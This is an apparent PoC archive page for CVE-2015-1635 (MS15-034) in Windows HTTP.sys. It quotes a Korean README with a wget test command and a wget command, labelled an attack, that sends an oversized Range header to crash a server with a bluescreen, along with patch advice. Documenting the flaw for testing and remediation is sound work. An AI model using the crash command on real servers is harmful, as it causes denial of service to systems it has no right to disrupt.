Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2015-1635 PoC — Microsoft Windows HTTP.sys 远程执行代码漏洞

Source
https://github.com/bongbongco/MS15-034
Associated Vulnerability
Title:Microsoft Windows HTTP.sys 远程执行代码漏洞 (CVE-2015-1635)
Description:HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."
Description
CVE-2015-1635
Readme
# MS15-034
MS15-034 POC

"현재 IIS 서버 버전은 알려진 취약점(CVE-2015-1635, MS15-034)이 존재하는 취약한 버전으로 해당 취약점을 활용할 시 원격 코드 실행 혹은 블루스크린 유발 등의 공격에 당할 위험이 존재한다. 
 - 테스트 구문 : wget --header=""Range: bytes=0-18446744073709551615"" <테스트할 서버 URL>
 - 블루스크린 유발 공격 구문 : wget --header=""Range: bytes=18-18446744073709551615"" <공격할 서버 URL>

※ https://technet.microsoft.com/library/security/ms15-034
※ http://blog.alyac.co.kr/303"
"Windows Server 2012 R2 용 보안 패치를 설치한다.
https://www.microsoft.com/ko-KR/download/details.aspx?id=46500"
File Snapshot

 [4.0K]  /data/pocs/2afb6ab5a9c02a4810d7ea44c973537f889b03ef
├── [1.3K]  MS15-034.py
└── [ 711]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →